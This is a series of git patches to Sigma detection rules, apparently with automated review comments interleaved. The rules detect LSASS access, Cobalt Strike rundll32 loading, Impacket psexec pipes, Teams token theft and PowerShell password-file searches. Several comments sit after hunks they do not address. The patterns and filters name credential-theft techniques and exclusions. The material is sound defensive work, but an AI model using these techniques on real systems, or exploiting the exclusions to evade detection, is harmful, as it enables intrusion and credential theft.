index c3d02ecdd..36d307d82 100755
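Review bot: `>2& echo "..."` in the three new checks of tests/check-baseline-local.sh does not write to stderr: bash parses `>2` as a redirection of stdout to a file literally named `2`, the `&` backgrounds that empty command, and the following `echo` prints to stdout. The pre-existing realpath check below uses the same form, so the new lines copy a latent bug rather than introduce one, but each new message should be written as `echo "xargs not found. Please install findutils." >&2` (or `>&2 echo ...`), and the six new echo lines plus the older ones fixed together. A side effect worth knowing while debugging is that a stray file named `2` appears in the working directory every time a missing tool is reported.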
--- a/rules/windows/image_load/image_load_susp_dbghelp_dbgcore_load.yml +++ b/rules/windows/image_load/image_load_susp_dbghelp_dbgcore_load.yml @@ -8,7 +8,7 @@ references: - https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html - https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6 date: 2019/10/27 -modified: 2022/08/09 +modified: 2022/09/15 logsource: category: image_load product: windows @@ -35,7 +35,7 @@ detection: - '\cscript.exe' - '\mshta.exe' # - '\regsvr32.exe' triggered by installing common software - - '\schtasks.exe' + # - '\schtasks.exe' triggered by installing software - '\dnx.exe' - '\regsvcs.exe' - '\sc.exe' From bde13350059aefd5833f151b0eda82924b6e2190 Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Fri, 16 Sep 2022 09:53:42 +0200 Subject: [PATCH 42/96] fix: FP with .NET ngen on test system --- .../registry_set/registry_set_taskcache_entry.yml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/rules/windows/registry/registry_set/registry_set_taskcache_entry.yml b/rules/windows/registry/registry_set/registry_set_taskcache_entry.yml index eaa29e421..c44153a11 100644 --- a/rules/windows/registry/registry_set/registry_set_taskcache_entry.yml +++ b/rules/windows/registry/registry_set/registry_set_taskcache_entry.yml @@ -3,7 +3,7 @@ id: 4720b7df-40c3-48fd-bbdf-fd4b3c464f0d description: Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious status: experimental date: 2021/06/18 -modified: 2022/08/24 +modified: 2022/09/16 references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - https://labs.f-secure.com/blog/scheduled-task-tampering/ 
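Review bot: Commenting out `'\schtasks.exe'` removes that image from the loader list for every environment, not just for the installer that produced the false positive; a narrower fix is a dedicated filter on the installing parent (for example a `filter_installer` selection on `ParentImage`) so a `schtasks.exe` load of dbghelp/dbgcore stays visible elsewhere. If dropping the entry is deliberate, the comment should name what triggered it so the entry can be restored later, e.g. `# - '\schtasks.exe' triggered by software installers (<installer name>)`. The `Image|endswith` list this entry belongs to starts above the hunk.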
@@ -26,9 +26,11 @@ detection: filter_svchost: Image: 'C:\WINDOWS\system32\svchost.exe' filter_ngen: - Image|startswith: 'C:\Windows\Microsoft.NET\Framework\' + Image|startswith: 'C:\Windows\Microsoft.NET\Framework' # \Framework\ and \Framework64\ Image|endswith: '\ngen.exe' - TargetObject|contains: '\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B66B135D-DA06-4FC4-95F8-7458E1D10129}' + TargetObject|contains: + - '\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B66B135D-DA06-4FC4-95F8-7458E1D10129}' + - '\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\.NET Framework\.NET Framework NGEN' filter_office_click_to_run: Image: - 'C:\Program Files\Microsoft Office\root\Integration\Integrator.exe' From bbc4aa329839f008cc63b1367b65203fa931824d Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Fri, 16 Sep 2022 10:08:08 +0200 Subject: [PATCH 43/96] improve detection rate --- ..._creation_win_cobaltstrike_load_by_rundll32.yml | 14 +++++++++----- 1 file changed, 9 insertions(+), 5 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_cobaltstrike_load_by_rundll32.yml b/rules/windows/process_creation/proc_creation_win_cobaltstrike_load_by_rundll32.yml index fa318be5f..59d50cbdb 100644 --- a/rules/windows/process_creation/proc_creation_win_cobaltstrike_load_by_rundll32.yml +++ b/rules/windows/process_creation/proc_creation_win_cobaltstrike_load_by_rundll32.yml @@ -3,7 +3,7 @@ status: test id: ae9c6a7c-9521-42a6-915e-5aaa8689d529 author: Wojciech Lesicki date: 2021/06/01 -modified: 2022/03/04 +modified: 2022/09/16 description: Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line. references: - https://www.cobaltstrike.com/help-windows-executable 
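Review bot: Dropping the trailing backslash in `Image|startswith: 'C:\Windows\Microsoft.NET\Framework'` makes the prefix stop in the middle of a path component, which is why the inline comment has to explain it; listing the two real directories keeps the anchor on a path boundary and makes the comment unnecessary: `Image|startswith:` / `- 'C:\Windows\Microsoft.NET\Framework\'` / `- 'C:\Windows\Microsoft.NET\Framework64\'`. The `Image|endswith: '\ngen.exe'` in the same filter limits the practical difference, so this is a precision and readability point rather than a coverage one. The new `TaskCache\Tree\...\.NET Framework NGEN` entry uses `contains` consistently with the existing GUID entry.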
@@ -16,14 +16,18 @@ logsource: category: process_creation product: windows detection: - selection: - CommandLine|contains|all: + selection_rundll: + - Image|endswith: '\rundll32.exe' + - OriginalFileName: RUNDLL32.EXE + - CommandLine|contains: - 'rundll32.exe' - - '.dll' + - 'rundll32 ' + selection_params: + CommandLine|contains: '.dll' CommandLine|endswith: - ' StartW' - ',StartW' - condition: selection + condition: all of selection* falsepositives: - Unknown level: high From 4ede1b413fa2f50d5a9509454d47054b43b26544 Mon Sep 17 00:00:00 2001 From: Borna Talebi <49802660+bornatalebi@users.noreply.github.com> Date: Fri, 16 Sep 2022 21:46:45 +0430 Subject: [PATCH 44/96] Update reference --- .../powershell_module/posh_pm_alternate_powershell_hosts.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml b/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml index 3fc16fea8..85ad15559 100644 --- a/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml +++ b/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml @@ -6,7 +6,7 @@ date: 2019/08/11 modified: 2022/04/21 author: Roberto Rodriguez @Cyb3rWard0g references: - - https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190815181010.html + - https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html tags: - attack.execution - attack.t1059.001 @@ -30,4 +30,4 @@ falsepositives: - Programs using PowerShell directly without invocation of a dedicated interpreter - MSP Detection Searcher - Citrix ConfigSync.ps1 -level: medium \ No newline at end of file +level: medium From c78b332ba7bb0c7f50248f770edb4349081d696b Mon Sep 17 00:00:00 2001 
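Review bot: `OriginalFileName: RUNDLL32.EXE` is the only unquoted string value in the new `selection_rundll`; quote it as `'RUNDLL32.EXE'` to match `'\rundll32.exe'` and `'rundll32 '` beside it and to keep the file uniform for yamllint. The split into `selection_rundll` (three alternative image indicators) and `selection_params` joined by `all of selection*` reads well, but the three entries are a list of maps and therefore OR-ed, which is not obvious to every reader; a one-line comment above `selection_rundll`, e.g. `# any one of: image name, PE original name, or command-line token`, would make the intent explicit. The trailing space in `'rundll32 '` looks deliberate and could also use a short comment saying it is.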
From: frack113 <62423083+frack113@users.noreply.github.com> Date: Fri, 16 Sep 2022 19:37:26 +0200 Subject: [PATCH 45/96] Add posh_ps_sensitive_file_discovery
---
.../posh_ps_sensitive_file_discovery.yml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml
diff --git a/rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml b/rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml
new file mode 100644
index 000000000..b4a5a05cd
--- /dev/null
+++ b/rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml
@@ -0,0 +1,34 @@
+title: Powershell Sensitive File Discovery
+id: 7d416556-6502-45b2-9bad-9d2f05f38997
+related:
+ - id: d23f2ba5-9da0-4463-8908-8ee47f614bb9
+ type: derived
+description: Detect adversaries enumerate sensitive files
+references:
+ - https://twitter.com/malmoeb/status/1570814999370801158
+status: experimental
+author: frack113
+date: 2022/09/16
+logsource:
+ product: windows
+ category: ps_script
+ definition: Script block logging must be enabled
+detection:
+ selection_action:
+ ScriptBlockText|contains:
+ - ls
+ - get-childitem
+ - gci
+ selection_recurse:
+ ScriptBlockText|contains: '-recurse'
+ selection_file:
+ ScriptBlockText|contains:
+ - 'pass'
+ - 'kdbx'
+ condition: all of selection_*
+falsepositives:
+ - Unknown
+level: medium
+tags:
+ - attack.discovery
+ - attack.t1083
From 2cd376c70cae25e8213b4cfc702e2c7beedb6458 Mon Sep 17 00:00:00 2001
From: frack113 <62423083+frack113@users.noreply.github.com> Date: Fri, 16 Sep 2022 20:04:55 +0200 Subject: [PATCH 46/96] fix pass
---
.../powershell_script/posh_ps_sensitive_file_discovery.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-)
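Review bot: The `selection_action` entries `ls` and `gci` are unanchored substrings, so `ls` also matches inside words like `false`, `tools` or `Controls` and `gci` inside longer cmdlet names; in practice nearly every script block that already contains `-recurse` and `pass` will satisfy it, and the selection contributes little. Anchoring the tokens (`- 'ls '`, `- 'gci '`, `- 'get-childitem '`) or using the `|re` modifier with word boundaries preserves the intent, and either way the values should be quoted like the other two lists in the rule. `description: Detect adversaries enumerate sensitive files` should read `Detects adversaries enumerating sensitive files`.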
diff --git a/rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml b/rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml index b4a5a05cd..5815a0ca6 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml @@ -23,8 +23,9 @@ detection: ScriptBlockText|contains: '-recurse' selection_file: ScriptBlockText|contains: - - 'pass' - - 'kdbx' + - '.pass' + - '.kdbx' + - '.kdb' condition: all of selection_* falsepositives: - Unknown From 8afb971e207a4dd85b06c0835a1cc8e9cf7089c6 Mon Sep 17 00:00:00 2001 From: Yamato Security <71482215+YamatoSecurity@users.noreply.github.com> Date: Sat, 17 Sep 2022 07:46:31 +0900 Subject: [PATCH 47/96] update application uninstalled rule --- .../builtin/application/win_builtin_remove_application.yml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/rules/windows/builtin/application/win_builtin_remove_application.yml b/rules/windows/builtin/application/win_builtin_remove_application.yml index 3209074b4..1a497e2b6 100644 --- a/rules/windows/builtin/application/win_builtin_remove_application.yml +++ b/rules/windows/builtin/application/win_builtin_remove_application.yml @@ -1,9 +1,10 @@ -title: An Application Is Uninstall +title: Application Uninstalled id: 570ae5ec-33dc-427c-b815-db86228ad43e status: experimental -description: An application have been remove check if it is a critical +description: An application has been removed. Check if it is critical. author: frack113 date: 2022/01/28 +modified: 2022/09/17 logsource: product: windows service: application @@ -16,7 +17,7 @@ detection: condition: selection falsepositives: - Unknown -level: low +level: informational tags: - attack.impact - attack.t1489 From 8b60317e2e42d23b579a612a7017e2fdda8ab1d0 Mon Sep 17 00:00:00 2001 
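Review bot: With the `contains` modifier `'.kdb'` already matches every occurrence of `'.kdbx'`, so the `.kdbx` entry is redundant; either keep only `'.kdb'` or add `# also covers .kdbx` so the next reader does not wonder. Moving from `'pass'` to `'.pass'` also stops matching names such as `password.txt` or `passwords.xlsx`, where no dot precedes `pass`; if the change was meant to silence parameter noise like `-PassThru` rather than to drop those names, an explicit `'password'` entry keeps that coverage. The `condition` and `falsepositives` lines are context here, so the rest of the rule is unchanged by this hunk.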
From: tr0mb1r Date: Sat, 17 Sep 2022 10:47:35 +0400 Subject: [PATCH 48/96] Microsoft Teams Suspicious ObjectAccess events (#3500)
---
.../win_teams_suspicious_objectaccess.yml | 27 +++++++++++++++++++ .../file_event_win_access_susp_teams.yml | 26 ++++++++++++++++++ ...ms_suspicious_command_line_cred_access.yml | 26 ++++++++++++++++++ 3 files changed, 79 insertions(+) create mode 100644 rules/windows/builtin/security/win_teams_suspicious_objectaccess.yml create mode 100644 rules/windows/file_event/file_event_win_access_susp_teams.yml create mode 100644 rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml
diff --git a/rules/windows/builtin/security/win_teams_suspicious_objectaccess.yml b/rules/windows/builtin/security/win_teams_suspicious_objectaccess.yml
new file mode 100644
index 000000000..e19c134ff
--- /dev/null
+++ b/rules/windows/builtin/security/win_teams_suspicious_objectaccess.yml
@@ -0,0 +1,27 @@
+title: Suspicious Teams Application Related ObjectAcess Event
+id: 25cde13e-8e20-4c29-b949-4e795b76f16f
+status: experimental
+description: Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.
+author: '@SerkinValery'
+references:
+ - https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/
+ - https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens
+date: 2022/09/16
+logsource:
+ product: windows
+ service: security
+detection:
+ selection:
+ EventID: 4663
+ ObjectName|contains:
+ - '\Microsoft\Teams\Cookies'
+ - '\Microsoft\Teams\Local Storage\leveldb'
+ filter:
+ ProcessName|contains: '\Microsoft\Teams\current\Teams.exe'
+ condition: selection and not filter
+falsepositives:
+ - Unknown
+level: high
+tags:
+ - attack.credential_access
+ - attack.t1528
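Review bot: The title misspells `ObjectAcess`; write `Suspicious Teams Application Related ObjectAccess Event`. Event 4663 is only emitted when Object Access auditing is enabled and a SACL exists on the audited paths, so on a default system this rule never fires; add a line under `logsource` such as `definition: Requires Object Access auditing and a SACL on the Teams profile directories (Cookies, Local Storage\leveldb)` so deployers know what to configure. `ProcessName|contains: '\Microsoft\Teams\current\Teams.exe'` can be tightened to `ProcessName|endswith`, since the value ends in a full executable name; the same applies to `Image|contains` in the file_event and process_creation rules added by this commit.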
diff --git a/rules/windows/file_event/file_event_win_access_susp_teams.yml b/rules/windows/file_event/file_event_win_access_susp_teams.yml
new file mode 100644
index 000000000..332a8a19c
--- /dev/null
+++ b/rules/windows/file_event/file_event_win_access_susp_teams.yml
@@ -0,0 +1,26 @@
+title: Suspicious File Event With Teams Objects
+id: 6902955a-01b7-432c-b32a-6f5f81d8f624
+status: experimental
+description: Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.
+author: '@SerkinValery'
+references:
+ - https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/
+ - https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens
+date: 2022/09/16
+logsource:
+ product: windows
+ category: file_event
+detection:
+ selection:
+ TargetFilename|contains:
+ - '\Microsoft\Teams\Cookies'
+ - '\Microsoft\Teams\Local Storage\leveldb'
+ filter:
+ Image|contains: '\Microsoft\Teams\current\Teams.exe'
+ condition: selection and not filter
+falsepositives:
+ - Unknown
+level: high
+tags:
+ - attack.credential_access
+ - attack.t1528
diff --git a/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml b/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml
new file mode 100644
index 000000000..3c0eb326c
--- /dev/null
+++ b/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml
@@ -0,0 +1,26 @@
+title: Suspicious Command With Teams Objects Pathes
+id: d2eb17db-1d39-41dc-b57f-301f6512fa75
+status: experimental
+description: Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.
+author: '@SerkinValery'
+references:
+ - https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/
+ - https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens
+date: 2022/09/16
+logsource:
+ product: windows
+ category: process_creation
+detection:
+ selection:
+ CommandLine|contains:
+ - '\Microsoft\Teams\Cookies'
+ - '\Microsoft\Teams\Local Storage\leveldb'
+ filter:
+ Image|contains: '\Microsoft\Teams\current\Teams.exe'
+ condition: selection and not filter
+falsepositives:
+ - Unknown
+level: high
+tags:
+ - attack.credential_access
+ - attack.t1528
From 9f6604cf819a619dd615c2f4771d15aacf782d20 Mon Sep 17 00:00:00 2001
From: Florian Roth Date: Sun, 18 Sep 2022 09:41:51 +0200 Subject: [PATCH 49/96] fix: aurora mtach calltrace msedeg.exe
---
.../proc_access_win_direct_syscall_ntopenprocess.yml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-)
diff --git a/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml b/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml
index c449009b1..7faa0f832 100755
--- a/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml
+++ b/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml
@@ -6,7 +6,7 @@ references:
status: experimental
author: Christian Burkard, Tim Shelton
date: 2021/07/28
-modified: 2022/08/09
+modified: 2022/09/18
logsource:
category: process_access
product: windows
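Review bot: `Pathes` in the title is a typo; write `Suspicious Command With Teams Objects Paths`. The description is copied from the security-log rule and claims the rule detects an access to tokens, but a process_creation rule only observes a command line that references the Teams cookie and leveldb paths — `Detects a command line referencing the Microsoft Teams token and cookie store paths` says what is actually seen. `Image|contains: '\Microsoft\Teams\current\Teams.exe'` in `filter` can be `Image|endswith`, as the value ends in the executable name.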
@@ -32,6 +32,8 @@ detection: falsepositive6: TargetImage|endswith: 'C:\Program Files\Mozilla Firefox\firefox.exe' SourceImage|endswith: 'C:\Program Files\Mozilla Firefox\firefox.exe' + falsepositive_kerneltrace_edge: # Cases in which the CallTrace is just e.g. 'UNKNOWN(19290435374)' from Microsoft-Windows-Kernel-Audit-API-Calls provider + CallTrace|endswith: ')' condition: selection and not 1 of falsepositive* falsepositives: - Unknown From 2da0554bedc5f3066064c1f61b318939edb33687 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sun, 18 Sep 2022 09:57:04 +0200 Subject: [PATCH 50/96] fix: temporarily disable Kernel-Audit-API-Calls --- .../proc_access_win_direct_syscall_ntopenprocess.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml b/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml index 7faa0f832..e1587a4f6 100755 --- a/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml +++ b/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml @@ -33,7 +33,7 @@ detection: TargetImage|endswith: 'C:\Program Files\Mozilla Firefox\firefox.exe' SourceImage|endswith: 'C:\Program Files\Mozilla Firefox\firefox.exe' falsepositive_kerneltrace_edge: # Cases in which the CallTrace is just e.g. 'UNKNOWN(19290435374)' from Microsoft-Windows-Kernel-Audit-API-Calls provider - CallTrace|endswith: ')' + Provider_Name: 'Microsoft-Windows-Kernel-Audit-API-Calls' condition: selection and not 1 of falsepositive* falsepositives: - Unknown From 2e8717d603ce7727240bbcec4d9f36285263052e Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sun, 18 Sep 2022 10:39:56 +0200 Subject: [PATCH 51/96] fix: taskhostw FPs with lsass access --- rules/windows/builtin/security/win_susp_lsass_dump_generic.yml | 3 +++ 1 file changed, 3 insertions(+) 
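Review bot: The inline comment on `falsepositive_kerneltrace_edge` still describes the `CallTrace` heuristic (`'UNKNOWN(19290435374)'`) that the second hunk replaces with a `Provider_Name` match, and the commit message calls the exclusion temporary, which the rule text does not record. Reword it to match the new key, e.g. `falsepositive_kerneltrace_edge: # TEMPORARY: events from this provider carry no usable CallTrace (only 'UNKNOWN(...)'); remove once CallTrace matching is possible for them`. Excluding the whole `Microsoft-Windows-Kernel-Audit-API-Calls` provider also drops any true positives it would have surfaced, which is worth a sentence in `description` or `falsepositives` until the filter is narrowed again.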
diff --git a/rules/windows/builtin/security/win_susp_lsass_dump_generic.yml b/rules/windows/builtin/security/win_susp_lsass_dump_generic.yml index 824d0f1ec..b462d8e29 100644 --- a/rules/windows/builtin/security/win_susp_lsass_dump_generic.yml +++ b/rules/windows/builtin/security/win_susp_lsass_dump_generic.yml @@ -70,6 +70,9 @@ detection: ProcessName|startswith: 'C:\Program Files' # too many false positives with legitimate AV and EDR solutions filter3: ProcessName: 'C:\Windows\CCM\CcmExec.exe' + filter4: + ProcessName: 'C:\Windows\System32\taskhostw.exe' + AccessMask: '0x10' condition: 1 of selection_* and not 1 of filter* fields: - ComputerName From 34957a784b16dd1ab3be976c3bcd0ff344c9d966 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sun, 18 Sep 2022 10:42:19 +0200 Subject: [PATCH 52/96] fix: modified date update --- rules/windows/builtin/security/win_susp_lsass_dump_generic.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/builtin/security/win_susp_lsass_dump_generic.yml b/rules/windows/builtin/security/win_susp_lsass_dump_generic.yml index b462d8e29..0942e28b4 100644 --- a/rules/windows/builtin/security/win_susp_lsass_dump_generic.yml +++ b/rules/windows/builtin/security/win_susp_lsass_dump_generic.yml @@ -4,7 +4,7 @@ description: Detects process handle on LSASS process with certain access mask status: experimental author: Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update) date: 2019/11/01 -modified: 2022/04/29 +modified: 2022/09/18 references: - https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment From 34d7ad03f7d7059a815ead1669694a62e2d38842 Mon Sep 17 00:00:00 2001 
From: Florian Roth Date: Sun, 18 Sep 2022 12:54:37 +0200 Subject: [PATCH 53/96] fix: FPs noticed with Aurora --- rules/windows/dns_query/dns_query_win_susp_ldap.yml | 4 +++- .../powershell_module/posh_pm_alternate_powershell_hosts.yml | 4 +++- .../proc_access_win_rare_proc_access_lsass.yml | 5 ++++- 3 files changed, 10 insertions(+), 3 deletions(-) diff --git a/rules/windows/dns_query/dns_query_win_susp_ldap.yml b/rules/windows/dns_query/dns_query_win_susp_ldap.yml index accfaf6e3..5f0998042 100644 --- a/rules/windows/dns_query/dns_query_win_susp_ldap.yml +++ b/rules/windows/dns_query/dns_query_win_susp_ldap.yml @@ -3,7 +3,7 @@ id: a21bcd7e-38ec-49ad-b69a-9ea17e69509e description: Detect suspicious ldap request from non Windows application status: experimental date: 2022/08/20 -modified: 2022/09/08 +modified: 2022/09/18 author: frack113 references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md @@ -20,6 +20,8 @@ detection: Image|endswith: '\MsMpEng.exe' filter_unknown: Image: '' + filter_azure: + Image|startswith: 'C:\WindowsAzure\GuestAgent' condition: dns_request and not 1 of filter_* falsepositives: - Programs that also lookup the observed domain diff --git a/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml b/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml index 3fc16fea8..7b7d84390 100644 --- a/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml +++ b/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml 
@@ -3,7 +3,7 @@ id: 64e8e417-c19a-475a-8d19-98ea705394cc description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe status: test date: 2019/08/11 -modified: 2022/04/21 +modified: 2022/09/18 author: Roberto Rodriguez @Cyb3rWard0g references: - https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190815181010.html @@ -25,6 +25,8 @@ detection: ContextInfo|contains: 'C:\Windows\system32\dsac.exe' filter_winrm: ContextInfo|contains: 'C:\Windows\system32\wsmprovhost.exe -Embedding' + filter_help_update: + Payload|contains: 'Update-Help' condition: selection and not 1 of filter* falsepositives: - Programs using PowerShell directly without invocation of a dedicated interpreter diff --git a/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml b/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml index 51c980f05..26a7bf029 100644 --- a/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml +++ b/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml @@ -7,7 +7,7 @@ status: experimental description: Detects process access to LSASS memory with suspicious access flags 0x410 and 0x01410 (spin-off of similar rule) author: Florian Roth date: 2022/03/13 -modified: 2022/08/13 +modified: 2022/09/18 references: - https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights - https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow @@ -92,6 +92,9 @@ detection: - '\MBAMInstallerService.exe' - '\WebEx\WebexHost.exe ' - '\Programs\Microsoft VS Code\Code.exe' + filter_xampp: + SourceImage|endswith: '\xampp-control.exe' + GrantedAccess: '0x410' condition: selection and not 1 of filter* fields: - User From 1c4a73f123cd584f0f43fff57086f0aff2693e4f Mon Sep 17 00:00:00 2001 
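Review bot: `filter_help_update` keys only on `Payload|contains: 'Update-Help'`, whereas every other filter in this rule anchors on the `ContextInfo` host path; any alternate PowerShell host whose payload happens to contain that substring is therefore excluded, which is a much looser exclusion than the "FPs noticed with Aurora" commit message implies. Pairing the payload match with the host that produced the benign events, or at least recording it in a comment, keeps the exclusion scoped, e.g. `filter_help_update: # Update-Help observed from <host image seen in testing>`. The `selection` this filter is subtracted from begins outside the hunk.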
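Review bot: `filter_xampp` excludes by file name alone (`SourceImage|endswith: '\xampp-control.exe'`) combined with `GrantedAccess: '0x410'`, so any binary carrying that name anywhere on disk receives the same exclusion for QUERY_INFORMATION|VM_READ handles to LSASS. The existing filter list above uses the same `endswith` style, so this is consistent, but for a third-party tool with a fixed install root an `|startswith` on that path would be tighter, and a comment noting where it was seen would help later tuning. The `selection` and the head of the filter list are outside the hunk.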
From: Florian Roth Date: Sun, 18 Sep 2022 12:56:52 +0200 Subject: [PATCH 54/96] fix: FP with PS ISE --- .../image_load/image_load_wsman_provider_image_load.yml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/rules/windows/image_load/image_load_wsman_provider_image_load.yml b/rules/windows/image_load/image_load_wsman_provider_image_load.yml index 1ce9ae1f7..846ebbbbb 100644 --- a/rules/windows/image_load/image_load_wsman_provider_image_load.yml +++ b/rules/windows/image_load/image_load_wsman_provider_image_load.yml @@ -3,7 +3,7 @@ id: ad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94 description: Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution. status: experimental date: 2020/06/24 -modified: 2022/07/18 +modified: 2022/09/18 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) tags: - attack.execution @@ -55,6 +55,8 @@ detection: Image|startswith: 'C:\Windows\Temp\asgard2-agent\' filter_citrix: Image|startswith: 'C:\Program Files\Citrix\' + filter_ps_ise: + Image|endswith: '\powershell_ise.exe' svchost: Image|endswith: '\svchost.exe' commandline_null: From 17e9b5ee31390541f306777b9fb9d44835606d01 Mon Sep 17 00:00:00 2001 From: Arturo <101707527+amjcyber@users.noreply.github.com> Date: Sun, 18 Sep 2022 15:38:54 +0200 Subject: [PATCH 55/96] Update win_impacket_psexec.yml Based on recent tests, the original RelativeTargetName from this rule are not accurate. The last "t" from each selection must be deleted in order to detect the predefined impacket psexec behavior. --- rules/windows/builtin/security/win_impacket_psexec.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/windows/builtin/security/win_impacket_psexec.yml b/rules/windows/builtin/security/win_impacket_psexec.yml index 036a3b101..ff7856880 100644 --- a/rules/windows/builtin/security/win_impacket_psexec.yml +++ b/rules/windows/builtin/security/win_impacket_psexec.yml 
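Review bot: `filter_ps_ise: Image|endswith: '\powershell_ise.exe'` is name-only, while the neighbouring `filter_citrix` and asgard filters pin a full path with `Image|startswith`. The ISE lives at a fixed location, so `Image: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe'` (plus the SysWOW64 copy if the 32-bit ISE appears in your telemetry) keeps the exclusion from applying to a renamed binary. The `detection` block continues outside the hunk.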
@@ -16,9 +16,9 @@ detection: EventID: 5145 ShareName: '\\\\\*\\IPC$' # looking for the string \\*\IPC$ RelativeTargetName|contains: - - 'RemCom_stdint' - - 'RemCom_stdoutt' - - 'RemCom_stderrt' + - 'RemCom_stdin' + - 'RemCom_stdout' + - 'RemCom_stderr' condition: selection1 falsepositives: - Unknown From bf660b2de26c9f50aa7b5f4ab424d536fa2fd480 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sun, 18 Sep 2022 16:21:05 +0200 Subject: [PATCH 56/96] fix: FPs (testing, and Windows 2022 test system) --- .../win_scm_database_privileged_operation.yml | 4 ++-- ...ile_event_win_webshell_creation_detect.yml | 21 ++++++++----------- ..._win_shell_write_susp_files_extensions.yml | 3 ++- ...ion_win_ntfs_short_name_path_use_image.yml | 13 +++++++++--- ...creation_win_ntfs_short_name_use_image.yml | 6 ++++-- .../proc_creation_win_susp_gup_execution.yml | 7 ++++++- ...c_creation_win_susp_regsvr32_anomalies.yml | 4 +++- ..._creation_win_susp_schtasks_env_folder.yml | 6 ++++-- .../registry_event_susp_atbroker_change.yml | 8 +++---- .../registry_set_add_port_monitor.yml | 9 +++++++- ...gistry_set_disable_autologger_sessions.yml | 5 ++++- 